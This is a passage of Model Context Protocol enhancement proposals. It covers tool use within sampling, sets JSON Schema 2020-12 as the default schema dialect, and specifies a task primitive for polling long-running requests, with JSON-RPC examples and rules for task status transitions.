name: string;
}
```
Pros:
* Safe, limited to that server’s tools.
* If we propagate the mcp-session-id, we can keep leveraging any server-side session context / caching
### Allow client to call any other MCP servers’ tools by itself in an agentic loop
Although this sounds similar to the previous one (allow only same server’s tools), this option wouldn’t need a protocol change / could be entirely done by the client as an implementation detail of their sampling support.
The end user would allowlist tools from any other MCP server for use in a sampling request, without the server having to ask for anything. The client UI would e.g. display a tool selection UI as part of the sampling approval flow, auto enabling tools from same server by default.
Pros:
* Technically no spec change needed (if anything, mention this as a freedom clients have)
* Possibly similar to what the intended semantics of [CreateMessageRequest.params.includeContext](https://modelcontextprotocol.io/specification/2025-06-18/schema#createmessagerequest) = `thisServer` / `allServers` may have been
* `CreateMessageRequest.params.allowImplicitToolCalls = "none" | "thisServer" | "allServers"`
(assuming we wanted to give the server any control over this)
Cons:
* High potential for privacy leaks / abuse; a classifier might be needed to mitigate it
* If user approves Gmail MCP tool usage / delegation by mistake, server gets access to their private emails through sampling
### Allow server to list & call clients’ tools (client/server → p2p)
If we say the client can now expose tools that the server can call, it opens a set of possibilities:
* The client can “forward” other servers’ tools (maybe w/ some namespacing for seamless aggregation)
* The server can then call these tools as part of its tool loop.
* Client & Server semantics start to lose weight, we enter a more peer-to-peer, symmetrical relationship
* Client could also ask a server for sampling, while we’re at it
* Symmetry at the protocol layer, but still directionality at the transport layer (e.g. for HTTP transport, direction of POST requests still matters)
### Simplify structured outputs use case
A major use case of sampling is to get outputs that conform to a given schema.
This is possible in [OpenAI’s API](https://platform.openai.com/docs/guides/structured-outputs) for instance.
The most common workaround is to give a single tool and set `tool_choice: "required"`, which guarantees the output is a ToolCall containing inputs that conform to the tool’s input schema.
While this SEP proposes we enable this `"required"`-based workaround, as a follow up it would be great to provide more explicit / simpler JSON Schema support. That would also allow schema types not allowed in tool inputs (tool inputs require an object w/ properties, so one has to pick at least a name for their outputs, which requires thinking about interplay w/ the prompting strategy):
```typescript theme={null}
interface CreateMessageRequest {
method: "sampling/createMessage";
params: {
messages: SamplingMessage[];
...
format: {
type: "json_schema",
"schema": {
"type": "array",
"minItems": 5,
"maxItems": 100
}
}
}
```
# SEP-1613: Establish JSON Schema 2020-12 as Default Dialect for MCP
Source: https://modelcontextprotocol.io/community/seps/1613-establish-json-schema-2020-12-as-default-dialect-f
Establish JSON Schema 2020-12 as Default Dialect for MCP
| Field | Value |
| ------------- | ------------------------------------------------------------------------------- |
| **SEP** | 1613 |
| **Title** | Establish JSON Schema 2020-12 as Default Dialect for MCP |
| **Status** | Final |
| **Type** | Standards Track |
| **Created** | 2025-10-06 |
| **Author(s)** | Ola Hungerford |
| **Sponsor** | None |
| **PR** | [#1613](https://github.com/modelcontextprotocol/modelcontextprotocol/pull/1613) |
***
## Abstract
This SEP establishes JSON Schema 2020-12 as the default dialect for embedded schemas within MCP messages (tool `inputSchema`/`outputSchema` and elicitation `requestedSchema` fields). Schemas may explicitly declare alternative dialects via the `$schema` field. This resolves ambiguity that has caused compatibility issues between implementations.
## Motivation
The MCP specification does not explicitly state which JSON Schema version to use for embedded schemas. This has caused:
* Validation failures between clients and servers assuming different versions
* Implementation divergence across SDK ecosystems
* Developer uncertainty requiring arbitrary version choices
Community discussion (GitHub Discussion #366, PR #655) revealed that implementations were split between draft-07 and 2020-12, with multiple maintainers and community members expressing strong preference for 2020-12 as the default.
## Specification
### 1. Default Dialect
Embedded JSON schemas within MCP messages **MUST** conform to [JSON Schema 2020-12](https://json-schema.org/draft/2020-12/schema) when no `$schema` field is present.
### 2. Explicit Dialect Declaration
Schemas **MAY** include an explicit `$schema` field to declare a different dialect:
```json theme={null}
{
"$schema": "https://json-schema.org/draft/2020-12/schema",
"type": "object",
"properties": {
"name": { "type": "string" }
}
}
```
### 3. Schema Validation Requirements
* Schemas **MUST** be valid according to their declared or default dialect
* The `inputSchema` field **MUST NOT** be `null`
**For tools with no parameters**, use one of these valid approaches:
* `true` - accepts any input (most permissive)
* `{}` - equivalent to `true`, accepts any input
* `{ "type": "object" }` - accepts any object with any properties
* `{ "type": "object", "additionalProperties": false }` - accepts only empty objects `{}`
**Example** for a tool with no parameters:
```json theme={null}
{
"name": "get_current_time",
"description": "Returns the current server time",
"inputSchema": {
"type": "object",
"additionalProperties": false
}
}
```
### 4. Scope of Application
This specification applies to:
* `tools/list` response: `inputSchema` and `outputSchema`
* `elicitation/create` request: `requestedSchema`
* Future MCP features embedding JSON Schema definitions
### 5. Implementation Requirements
**Servers MUST:**
* Generate schemas conforming to 2020-12 by default
* Include explicit `$schema` when using non-default dialects
**Clients MUST:**
* Validate schemas according to declared or default dialect
* Support at least JSON Schema 2020-12
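As a non-normative sketch, a client using Ajv (one mature validator library) might select the dialect like this, defaulting to 2020-12 when `$schema` is absent; the helper name is invented:

```typescript theme={null}
import Ajv from "ajv";               // draft-07 support (Ajv v8 default class)
import Ajv2020 from "ajv/dist/2020"; // JSON Schema 2020-12 support

const draft07 = new Ajv();
const ajv2020 = new Ajv2020();

// Pick the validator from $schema, defaulting to 2020-12 per this SEP.
function compileEmbeddedSchema(schema: Record<string, unknown>) {
  const dialect =
    typeof schema.$schema === "string"
      ? schema.$schema
      : "https://json-schema.org/draft/2020-12/schema";
  return dialect.includes("draft-07") ? draft07.compile(schema) : ajv2020.compile(schema);
}

// Usage: validate arguments against a tool's inputSchema.
const validate = compileEmbeddedSchema({
  type: "object",
  properties: { name: { type: "string" } },
});
console.log(validate({ name: "mcp" })); // true
```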
## Rationale
### Why 2020-12?
1. **Ecosystem alignment**: Python SDK (via Pydantic) and Go SDK implementations prefer/use 2020-12
2. **Modern features**: Better validation capabilities and composition support
3. **Community preference**: Multiple maintainers and community members in PR #655 discussion advocated for 2020-12 over draft-07
4. **Current standard**: 2020-12 is the stable version as of 2025
### Why allow explicit declaration?
* Supports migration paths for existing schemas
* Provides flexibility without protocol changes
* Follows JSON Schema best practices
### Alternatives considered
* **Draft-07 as default**: Rejected after community feedback; older version with less capability
* **No default**: Rejected as unnecessarily verbose; adds boilerplate
* **Multiple equal versions**: Rejected; creates unpredictability and fragmentation
## Backward Compatibility
This is technically a **clarification**, not a breaking change:
* Existing schemas without `$schema` default to 2020-12
* Servers can add explicit `$schema` during transition
* Basic schemas (type, properties, required) work across versions
**Migration may be needed for schemas assuming draft-07 by default:**
* Schemas using `dependencies` (→ `dependentSchemas` + `dependentRequired`)
* Positional array validation (→ `prefixItems`)
**Migration strategy:** Add explicit `$schema: "http://json-schema.org/draft-07/schema#"` during transition, then update to 2020-12 features.
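For example (both schemas below are invented for illustration), a draft-07 property dependency maps onto the 2020-12 `dependentRequired` keyword:

```typescript theme={null}
// draft-07: "dependencies" mixes two behaviours in one keyword.
const draft07Style = {
  $schema: "http://json-schema.org/draft-07/schema#",
  type: "object",
  dependencies: {
    creditCard: ["billingAddress"], // require billingAddress when creditCard is present
  },
};

// 2020-12: the property form becomes "dependentRequired"
// (a schema-valued dependency would become "dependentSchemas").
const draft2020Style = {
  $schema: "https://json-schema.org/draft/2020-12/schema",
  type: "object",
  dependentRequired: {
    creditCard: ["billingAddress"], // same constraint, 2020-12 keyword
  },
};
```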
## Reference Implementation
### SDK Implementations
**Python SDK** - Already compatible:
* Uses Pydantic for schema generation
* Pydantic defaults to 2020-12 via `.model_json_schema()`
**Go SDK** - Implemented 2020-12:
* Explicit 2020-12 implementation completed
* Confirmed by @samthanawalla in PR #655 discussion
**Other SDKs:**
* May require updates, but based on the examples above there should be straightforward or out-of-the-box options to support this. I can add more examples here, or we can create issues to follow up after acceptance.
## Security Implications
No specific security implications have been identified from establishing 2020-12 as the default dialect. The clarification reduces ambiguity that could lead to validation mismatches between implementations, which is a minor security improvement through increased predictability.
Implementations should use well-maintained JSON Schema validator libraries and keep them updated, as with any dependency.
## Related Work
### [SEP-1330: Elicitation Enum Schema Improvements](https://github.com/modelcontextprotocol/modelcontextprotocol/issues/1330)
**SEP-1330** proposes deprecating the non-standard `enumNames` property in favor of JSON Schema 2020-12 compliant patterns. This work is directly enabled by establishing 2020-12 as the default dialect.
**Implementation Consideration:**
As noted in SEP-1330 discussion, there is some concern about parsing complexity with advanced JSON Schema features like `oneOf` and `anyOf`. However, these features are part of the JSON Schema standard and well-supported by mature validator libraries. Implementations can balance standards compliance with their parsing needs by using well-tested JSON Schema validation libraries.
### [SEP-834: Full JSON Schema 2020-12 Support](https://github.com/modelcontextprotocol/modelcontextprotocol/issues/834)
This SEP establishes the foundation (default dialect) while SEP-834 addresses comprehensive support for 2020-12 features.
## Open Questions
The schema for the spec itself references `draft-07`, and the `typescript-json-schema` package we use to generate it only supports draft-07.
Options:
1. Update schema generation script to patch to 2020-12 after generation (this is what I did in the current PR)
2. Switch to a different schema generator that supports 2020-12
3. Leave as-is since it doesn't actually conflict with the spec?
Personally I'd prefer (1) in the short term and then (2) as a follow-up.
# SEP-1686: Tasks
Source: https://modelcontextprotocol.io/community/seps/1686-tasks
Tasks
| Field | Value |
| ------------- | ------------------------------------------------------------------------------- |
| **SEP** | 1686 |
| **Title** | Tasks |
| **Status** | Final |
| **Type** | Standards Track |
| **Created** | 2025-10-20 |
| **Author(s)** | Surbhi Bansal, Luca Chang |
| **Sponsor** | None |
| **PR** | [#1686](https://github.com/modelcontextprotocol/modelcontextprotocol/pull/1686) |
***
## Abstract
This SEP improves support for task-based workflows in the Model Context Protocol (MCP). It introduces both the **task primitive** and the associated **task ID**, which can be used to query the state and results of a task, up to a server-defined duration after the task has completed. This primitive is designed to augment other requests (such as tool calls) to enable call-now, fetch-later execution patterns across all requests for servers that support this primitive.
## Motivation
The current MCP specification supports tool calls that execute a request and eventually receive a response, and tool calls can be passed a progress token to integrate with MCP’s progress-tracking functionality, enabling host applications to receive status updates for a tool call via notifications. However, there is no way for a client to explicitly request the status of a tool call, resulting in states where it is possible for a tool call to have been dropped on the server, and it is unknown if a response or a notification may ever arrive. Similarly, there is no way for a client to explicitly retrieve the result of a tool call after it has completed — if the result was dropped, clients must call the tool again, which is undesirable for tools expected to take minutes or more. This is particularly relevant for MCP servers abstracting existing workflow-based APIs, such as AWS Step Functions, Workflows for Google Cloud, or APIs representing CI/CD pipelines, among other applications.
Today, it is possible for individual MCP servers to represent tools in a way that enables this, with certain compromises. For example, a server may expose a `long_running_tool` and wish to support this pattern, splitting it into three separate tools to accommodate this:
1. `start_long_running_tool`: This would start the work represented by `long_running_tool` and return a tracking token of some kind, such as a job ID.
2. `get_long_running_tool_status(token)`: This would accept the tracking token and return the current status of the tool call, informing the caller that the operation is still ongoing.
3. `get_long_running_tool_result(token)`: This would accept the tracking token and return the result of the tool call, if it is available.
Representing a tool in this way seems to solve the use case, but it introduces a new problem: tools are generally expected to be orchestrated by an agent, and agent-driven polling is both unnecessarily expensive and inconsistent; it relies on prompt engineering to steer an agent to poll at all. In the original `long_running_tool` case, the client had no way of knowing if a response would ever be received, while in the `start_long_running_tool` case, the application has no way of knowing if the agent will orchestrate tools according to the specific contract of the server.
It is also impossible for the host application to take ownership of this orchestration, as this tool-splitting is both conventions-based and may be implemented in different ways across MCP servers — one server may have three tools for one conceptual operation (as in our example), or it may have more, in the case of more complex, multi-step operations.
On the other hand, if active task polling is not needed, existing MCP servers can fully wrap a workflow API in a single tool call that polls for a result, but this introduces an undesirable implementation cost: an MCP server wrapping an existing workflow API is a server that only exists for polling other systems.
**Affected Customer Use Cases**
These concerns are backed by real use cases that Amazon has seen both internally and with external customers (identities redacted where non-public):
**1. Healthcare & Life Sciences Data Analysis**
***Challenge:*** Amazon’s customers in the healthcare and life sciences industry are attempting to use MCP to wrap existing computational tools to analyze molecular properties and predict drug interactions, processing hundreds of thousands of data points per job from chemical libraries through multiple inference models simultaneously. These complex, multi-step workflows require a way to actively check statuses, as they take upwards of several hours, making retries undesirable.
***Current Workaround:*** Not yet determined.
***Impact:*** Cannot integrate with real-time research workflows, prevents interactive drug discovery platforms, and blocks automated research pipelines. These customers are looking for best practices for workflow-based tool calls and have noted the lack of first-class support in MCP as a concern. If these customers do not have a solution for long-running tool calls, they will likely forego MCP and continue using their existing platforms.
***Ideal:*** Concurrent and poll-able tool calls as an answer for operations executing in the range of a few minutes, and some form of push notification system to avoid blocking their agents on long analyses on the order of hours. This SEP supports the former use case, and offers a framework that could extend to support the latter.
**2. Enterprise Automation Platforms**
***Challenge:*** Amazon’s large enterprise customers are looking to develop internal MCP platforms to automate SDLC processes across their organizations, extending to sales, customer service, legal, HR, and cross-divisional teams. They have noted they have long-running agent and agent-tool interactions, supporting complex business process automation.
***Current Workaround:*** Not yet determined. Considering an application-level system outside of MCP backed by webhooks.
***Impact:*** Limitations related to the host application being unaware of tool execution state prevent complex business process automation and limit sophisticated multi-step operations. These customers want to dispatch processes concurrently and collect their results later, and are noting the lack of explicit late-retrieval as a concern — and are considering involved application-level notification systems as a possible workaround.
***Ideal:*** Built-in mechanisms for actively checking the status of ongoing work to avoid needing to implement notification systems specific to their own tool conventions themselves.
**3. Code Migration Workflows**
***Challenge:*** Amazon has automated code migration and transformation tools to perform upgrades across its own codebases and those of external customers, and is attempting to wrap those tools in MCP servers. These migrations analyze dependencies, transform code to avoid deprecated runtime features, and validate changes across multiple repositories. They range from minutes to hours depending on migration scope, complexity, and validation requirements.
***Current Workaround:*** Developers implement manual tracking by splitting a job into `create` and `get` tools, forcing models to manage state and repeatedly poll for completion.
***Impact:*** Poor developer experience due to needing to replicate this hand-rolled polling mechanism across many tools. One team had to debug an issue where the model would hallucinate job names if it hadn’t listed them first. Validating that this does not happen across many tools in a large toolset is time-consuming and error-prone.
***Ideal:*** Support natively polling tool state at the data layer to support pushing a tool to the background and avoiding blocking other tasks in the chat session, while still supporting deterministic polling and result retrieval. The team needs the same pattern across many tools in their MCP servers, and wants a common solution across them, which this SEP directly supports.
**4. Test Execution Platforms**
***Challenge:*** Amazon’s internal test infrastructure executes comprehensive test suites including thousands of cases, integration tests across services, and performance benchmarks. They have built an MCP server wrapping this existing infrastructure.
***Current Workaround:*** For streaming test logs, the MCP server exposes a tool that can read a range of log lines, as it cannot effectively notify the client when the execution is complete. There is not yet any workaround for executing test runs.
***Impact:*** Cannot run a test suite and stream its logs simultaneously without a single hours-long tool call, which would time out on either the client or the server. This prevents agents from looking into test failures in an incomplete test run until the entire test suite has completed, potentially hours later.
***Ideal:*** Support host application-driven tool polling for intermediate results, so a client can be notified when a long-running tool is complete. This SEP does not fully support this use case (it does enable polling), but the Task execution model can be extended to do so, as discussed in the “Future Work” section.
**5. Deep Research**
***Challenge:*** Deep research tools spawn multiple research agents to gather and summarize information about topics, going through several rounds of search and conversation turns internally to produce a final result for the caller application. The tool takes an extended amount of time to execute, and it is not always clear if the tool is still executing.
***Current Workaround:*** The research tool is split into a separate `create` tool to create a report job and a `get` tool to get the status/result of that job later.
***Impact:*** When using this with host applications, the agent sometimes runs into issues calling the `get` tool repeatedly — in particular, it calls the tool once before ending its conversation turn, claiming to be "waiting" before calling the tool again. It cannot resume until receiving a new user message. This also complicates expiration times, as it is not possible to predict when the client will retrieve the result when this occurs. It is possible to work around this by adding a `wait` tool for the model, but this prevents the model from doing anything else concurrently.
***Ideal:*** Support polling a tool call’s state in a deterministic way and notify the model when a result is ready, so the tool result can be immediately retrieved and deleted from the server. Other than notifying the model (a host application concern), this SEP fully supports this use case.
**6. Agent-to-Agent Communication (Multi-Agent Systems)**
***Challenge:*** One of Amazon’s internal multi-agent systems for customer question answering faces scenarios where agents require significant processing time for complex reasoning, research, or analysis. When agents communicate through MCP, slow agents cause cascading delays throughout this system, as agents are forced to wait on their peers to complete their work.
***Current Workaround:*** Not yet determined.
***Impact:*** Communication pattern creates cascading delays, prevents parallel agent processing, and degrades system responsiveness for other time-sensitive interactions.
***Ideal:*** Some method to allow agents to perform other work concurrently and get notified once long-running tasks complete. This SEP supports this use case by enabling host applications to implement background polling for select tool calls without blocking agents.
These use cases demonstrate that a mechanism to actively track tool calls and defer results is a real requirement for these types of MCP deployments in production environments.
**Integration with Existing Architectures**
Many workflow-driven systems already provide active execution-tracking capabilities with built-in status metadata, monitoring, and data retention policies. This proposal enables MCP servers to expose these existing APIs with thin MCP wrappers while maintaining their existing reliability.
**Benefits for Existing Architectures:**
* **Leverage Existing State Management:** Systems like AWS Step Functions, Workflows for Google Cloud, and CI/CD platforms already maintain execution state, logs, and results. MCP servers can expose these systems' existing APIs without pushing the responsibility of polling to a fallible agent.
* **Preserve Native Monitoring:** Existing monitoring, alerting, and observability tools continue to work unchanged. The execution happens almost entirely within the existing workflow-management system.
* **Reduce Implementation Overhead:** Server implementers don't need to build new state management, persistence, or monitoring infrastructure. They can focus on the MCP protocol mapping of their existing APIs to tasks.
This SEP simplifies integration with existing workflows and allows workflow services to continue to manage their own state while delivering a quality customer experience, rather than offloading to agent-polling or building MCP servers that do nothing but poll other services.
## Specification
This SEP introduces a mechanism for requestors (which can be either clients or servers, depending on the direction of communication) to augment their requests with **tasks**. Tasks are durable state machines that carry information about the underlying execution state of the request they wrap, and are intended for requestor polling and deferred result retrieval. Each task is uniquely identifiable by a requestor-generated **task ID**.
### 1. User Interaction Model
Tasks are designed to be **application-driven**: receivers tightly control which requests (if any) support task-based execution and manage the lifecycles of those tasks; meanwhile, requestors own the responsibility for augmenting requests with tasks, and for polling on the results of those tasks.
Implementations are free to expose tasks through any interface pattern that suits their needs—the protocol itself does not mandate any specific user interaction model.
### 2. Capabilities
Servers and clients that support task-augmented requests **MUST** declare a `tasks` capability during initialization. The `tasks` capability is structured by request category, with boolean properties indicating which specific request types support task augmentation.
Refer to [https://github.com/modelcontextprotocol/modelcontextprotocol/pull/1732](https://github.com/modelcontextprotocol/modelcontextprotocol/pull/1732) for details.
### 3. Protocol Messages
#### 3.1. Creating Tasks
To create a task, requestors send a request with the `modelcontextprotocol.io/task` key included in `_meta`, with a `taskId` value representing the task ID. Requestors **MAY** also include a `keepAlive` value (in milliseconds) indicating how long after completion they would like the task results to be retained.
**Request:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 1,
"method": "some_method",
"params": {
"_meta": {
"modelcontextprotocol.io/task": {
"taskId": "786512e2-9e0d-44bd-8f29-789f320fe840",
"keepAlive": 60000
}
}
}
}
```
#### 3.2. Getting Tasks
To retrieve the state of a task, requestors send a `tasks/get` request:
**Request:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 3,
"method": "tasks/get",
"params": {
"taskId": "786512e2-9e0d-44bd-8f29-789f320fe840",
"_meta": {
"modelcontextprotocol.io/related-task": {
"taskId": "786512e2-9e0d-44bd-8f29-789f320fe840"
}
}
}
}
```
**Response:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 3,
"result": {
"taskId": "786512e2-9e0d-44bd-8f29-789f320fe840",
"keepAlive": 30000,
"pollFrequency": 5000,
"status": "submitted",
"_meta": {
"modelcontextprotocol.io/related-task": {
"taskId": "786512e2-9e0d-44bd-8f29-789f320fe840"
}
}
}
}
```
#### 3.3. Retrieving Task Results
To retrieve the result of a completed task, requestors send a `tasks/result` request:
**Request:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 4,
"method": "tasks/result",
"params": {
"taskId": "786512e2-9e0d-44bd-8f29-789f320fe840",
"_meta": {
"modelcontextprotocol.io/related-task": {
"taskId": "786512e2-9e0d-44bd-8f29-789f320fe840"
}
}
}
}
```
**Response:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 4,
"result": {
"content": [
{
"type": "text",
"text": "Current weather in New York:\nTemperature: 72°F\nConditions: Partly cloudy"
}
],
"isError": false,
"_meta": {
"modelcontextprotocol.io/related-task": {
"taskId": "786512e2-9e0d-44bd-8f29-789f320fe840"
}
}
}
}
```
#### 3.4. Task Creation Notification
When a receiver creates a task, it **MUST** send a `notifications/tasks/created` notification to inform the requestor that the task has been created and polling can begin.
**Notification:**
```json theme={null}
{
"jsonrpc": "2.0",
"method": "notifications/tasks/created",
"params": {
"_meta": {
"modelcontextprotocol.io/related-task": {
"taskId": "786512e2-9e0d-44bd-8f29-789f320fe840"
}
}
}
}
```
The task ID is conveyed through the `modelcontextprotocol.io/related-task` metadata key. The notification parameters are otherwise empty.
This notification resolves the race condition where a requestor might attempt to poll for a task before the receiver has finished creating it. By sending this notification immediately after task creation, the receiver signals that the task is ready to be queried via `tasks/get`.
Receivers that do not support tasks (and thus ignore task metadata in requests) will not send this notification, allowing requestors to fall back to waiting for the original request response.
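Putting sections 3.1 through 3.4 together, a requestor's call-now, fetch-later flow might look like the following sketch; the `send`, `waitForTaskCreated`, and `sleep` helpers are assumptions rather than SDK APIs:

```typescript theme={null}
// Assumed helpers: `send` issues a JSON-RPC request and resolves with its
// result; `waitForTaskCreated` resolves when notifications/tasks/created
// arrives for the given task ID; `sleep` delays for the given milliseconds.
declare function send(method: string, params: object): Promise<any>;
declare function waitForTaskCreated(taskId: string): Promise<"task-created">;
declare function sleep(ms: number): Promise<void>;

async function callToolAsTask(name: string, args: object) {
  const taskId = crypto.randomUUID(); // available in modern Node and browsers
  const plainResponse = send("tools/call", {
    name,
    arguments: args,
    _meta: { "modelcontextprotocol.io/task": { taskId, keepAlive: 60_000 } },
  });

  // Race the creation notification against the plain response: receivers
  // without task support simply answer the request (section 3.4).
  const first = await Promise.race([waitForTaskCreated(taskId), plainResponse]);
  if (first !== "task-created") return first;

  // Poll tasks/get until the task reaches a terminal status.
  for (;;) {
    const task = await send("tasks/get", { taskId });
    if (task.status === "completed") return send("tasks/result", { taskId });
    if (["failed", "cancelled", "unknown"].includes(task.status)) {
      throw new Error(`task ${taskId} ended in status ${task.status}`);
    }
    await sleep(task.pollFrequency ?? 5_000); // respect the suggested interval
  }
}
```

The `Promise.race` expresses the fallback described above: if the receiver ignores the task metadata, the plain response simply wins the race.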
#### 3.5. Listing Tasks
To retrieve a list of tasks, requestors send a `tasks/list` request. This operation supports pagination.
**Request:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 5,
"method": "tasks/list",
"params": {
"cursor": "optional-cursor-value"
}
}
```
**Response:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 5,
"result": {
"tasks": [
{
"taskId": "786512e2-9e0d-44bd-8f29-789f320fe840",
"status": "working",
"keepAlive": 30000,
"pollFrequency": 5000
},
{
"taskId": "abc123-def456-ghi789",
"status": "completed",
"keepAlive": 60000
}
],
"nextCursor": "next-page-cursor"
}
}
```
#### 3.6 Deleting Tasks
To explicitly delete a task and its associated results, requestors send a `tasks/delete` request.
**Request:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 6,
"method": "tasks/delete",
"params": {
"taskId": "786512e2-9e0d-44bd-8f29-789f320fe840",
"_meta": {
"modelcontextprotocol.io/related-task": {
"taskId": "786512e2-9e0d-44bd-8f29-789f320fe840"
}
}
}
}
```
**Response:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 6,
"result": {
"_meta": {
"modelcontextprotocol.io/related-task": {
"taskId": "786512e2-9e0d-44bd-8f29-789f320fe840"
}
}
}
}
```
### 4. Behavior Requirements
These requirements apply to all parties that support receiving task-augmented requests.
#### 4.1. Task Support and Handling
1. Receivers that do not support task augmentation on a request **MUST** process the request normally, ignoring any task metadata in `_meta`.
2. Receivers that support task augmentation **MAY** choose which request types support tasks.
#### 4.2. Task ID Requirements
1. Task IDs **MUST** be a string value.
2. Task IDs **SHOULD** be unique across all tasks controlled by the receiver.
3. The receiver of a request with a task ID in its `_meta` **MAY** validate that the provided task ID has not already been associated with a task controlled by that receiver.
#### 4.3. Task Status Lifecycle
1. Tasks **MUST** begin in the `submitted` status when created.
2. Receivers **MUST** only transition tasks through the following valid paths:
1. From `submitted`: may move to `working`, `input_required`, `completed`, `failed`, `cancelled`, or `unknown`
2. From `working`: may move to `input_required`, `completed`, `failed`, `cancelled`, or `unknown`
3. From `input_required`: may move to `working`, `completed`, `failed`, `cancelled`, or `unknown`
4. Tasks in `completed`, `failed`, `cancelled`, or `unknown` status **MUST NOT** transition to any other status (terminal states)
3. Receivers **MAY** move directly from `submitted` to `completed` if execution completes immediately.
4. The `unknown` status is a terminal fallback state for unexpected error conditions. Receivers **SHOULD** use `failed` with an error message instead when possible.
**Task Status State Diagram:**
```mermaid theme={null}
stateDiagram-v2
[*] --> submitted
submitted --> working
submitted --> terminal
working --> input_required
working --> terminal
input_required --> working
input_required --> terminal
terminal --> [*]
note right of terminal
Terminal states:
• completed
• failed
• cancelled
• unknown
end note
```
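A receiver could enforce these transition rules with a simple lookup table. The following is a minimal sketch, not part of the specification:
```typescript theme={null}
type TaskStatus =
  | "submitted" | "working" | "input_required"
  | "completed" | "failed" | "cancelled" | "unknown";

// Terminal statuses never transition to anything else.
const TERMINAL: TaskStatus[] = ["completed", "failed", "cancelled", "unknown"];

// Valid next statuses for each non-terminal status, per the rules above.
const VALID_TRANSITIONS: Record<string, TaskStatus[]> = {
  submitted: ["working", "input_required", ...TERMINAL],
  working: ["input_required", ...TERMINAL],
  input_required: ["working", ...TERMINAL],
};

function canTransition(from: TaskStatus, to: TaskStatus): boolean {
  return VALID_TRANSITIONS[from]?.includes(to) ?? false;
}
```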
#### 4.4. Input Required Status
1. When a receiver sends a request associated with a task (e.g., elicitation, sampling), the receiver **MUST** move the task to the `input_required` status.
2. The receiver **MUST** include the `modelcontextprotocol.io/related-task` metadata in the request to associate it with the task.
3. When the receiver receives all required responses, the task **MAY** transition out of `input_required` status (typically back to `working`).
4. If multiple related requests are pending, the task **SHOULD** remain in `input_required` status until all are resolved.
#### 4.5. Keep-Alive and Resource Management
1. Receivers **MAY** override the requested `keepAlive` duration.
2. Receivers **MUST** include the actual `keepAlive` duration (or `null` for unlimited) in `tasks/get` responses.
3. After a task reaches a terminal status (`completed`, `failed`, `cancelled`, or `unknown`) and its `keepAlive` duration has elapsed, receivers **MAY** delete the task and its results.
4. Receivers **MAY** include a `pollFrequency` value (in milliseconds) in `tasks/get` responses to suggest polling intervals. Requestors **SHOULD** respect this value when provided.
#### 4.6. Result Retrieval
1. Receivers **MUST** only return results from `tasks/result` when the task status is `completed`.
2. Receivers **MUST** return an error if `tasks/result` is called for a task in any other status.
3. Requestors **MAY** call `tasks/result` multiple times for the same task while it remains available.
#### 4.7. Associating Task-Related Messages
1. All requests, notifications, and responses related to a task **MUST** include the `modelcontextprotocol.io/related-task` key in their `_meta`, with the value set to an object with a `taskId` matching the associated task ID.
2. For example, an elicitation that a task-augmented tool call depends on **MUST** share the same related task ID with that tool call's task.
#### 4.8. Task Cancellation
1. When a receiver receives a `notifications/cancelled` notification for the JSON-RPC request ID of a task-augmented request, the receiver **SHOULD** immediately move the task to the `cancelled` status and cease all processing associated with that task.
2. Due to the asynchronous nature of notifications, cancellation might not take effect instantaneously. Receivers **SHOULD** make a best-effort attempt to halt execution as quickly as possible.
3. If a `notifications/cancelled` notification arrives after a task has already reached a terminal status (`completed`, `failed`, `cancelled`, or `unknown`), receivers **SHOULD** ignore the notification.
4. After a task reaches `cancelled` status and its `keepAlive` duration has elapsed, receivers **MAY** delete the task and its metadata.
5. Requestors **MAY** send `notifications/cancelled` at any time during task execution, including when the task is in `input_required` status. If a task is cancelled while in `input_required` status, receivers **SHOULD** also disregard any pending responses to associated requests.
6. Because notifications do not provide confirmation of receipt, requestors **SHOULD** continue to poll with `tasks/get` after sending a cancellation notification to confirm the task has transitioned to `cancelled` status. If the task does not transition to `cancelled` within a reasonable timeframe, requestors **MAY** assume the cancellation was not processed.
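Taken together, a requestor might implement cancellation as notify-then-confirm. This sketch assumes hypothetical `sendNotification` and `sendRequest` transport helpers:
```typescript theme={null}
declare function sendNotification(method: string, params: object): Promise<void>;
declare function sendRequest(method: string, params: object): Promise<any>;
const sleep = (ms: number) => new Promise<void>((resolve) => setTimeout(resolve, ms));

// Cancel the original request, then poll tasks/get to confirm the task actually
// reached "cancelled" (notifications carry no confirmation of receipt).
async function cancelAndConfirm(requestId: number, taskId: string, timeoutMs = 10_000): Promise<boolean> {
  await sendNotification("notifications/cancelled", { requestId });
  const deadline = Date.now() + timeoutMs;
  while (Date.now() < deadline) {
    const task = await sendRequest("tasks/get", { taskId });
    if (task.status === "cancelled") return true;
    // Another terminal status means the task finished before cancellation took effect.
    if (["completed", "failed", "unknown"].includes(task.status)) return false;
    await sleep(task.pollFrequency ?? 1000);
  }
  return false; // No transition within the timeframe: assume cancellation was not processed.
}
```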
#### 4.9. Task Listing
1. Receivers **SHOULD** use cursor-based pagination to limit the number of tasks returned in a single response.
2. Receivers **MUST** include a `nextCursor` in the response if more tasks are available.
3. Requestors **MUST** treat cursors as opaque tokens and not attempt to parse or modify them.
4. If a task is retrievable via `tasks/get` for a requestor, it **MUST** be retrievable via `tasks/list` for that requestor.
#### 4.10. Task Deletion
1. Receivers **MAY** accept or reject delete requests for any task at their discretion.
2. If a receiver accepts a delete request, it **SHOULD** delete the task and all associated results and metadata.
3. Receivers **MAY** choose not to support deletion at all, or only support deletion for tasks in certain statuses (e.g., only terminal statuses).
4. Requestors **SHOULD** delete tasks containing sensitive data promptly rather than relying solely on `keepAlive` expiration for cleanup.
### 5. Message Flow
See the sequence diagrams in [this issue comment](https://github.com/modelcontextprotocol/modelcontextprotocol/issues/1686#issuecomment-3452378176).
### 6. Data Types
#### Task
A task represents the execution state of a request. The task metadata includes:
* `taskId`: Unique identifier for the task
* `keepAlive`: Time in milliseconds that results will be kept available after completion
* `pollFrequency`: Suggested time in milliseconds between status checks
* `status`: Current state of the task execution
#### Task Status
Tasks can be in one of the following states:
* `submitted`: The request has been received and queued for execution
* `working`: The request is currently being processed
* `input_required`: The request is waiting on additional input from the requestor
* `completed`: The request completed successfully and results are available
* `failed`: The task lifecycle itself encountered an error, unrelated to the associated request logic
* `cancelled`: The request was cancelled before completion
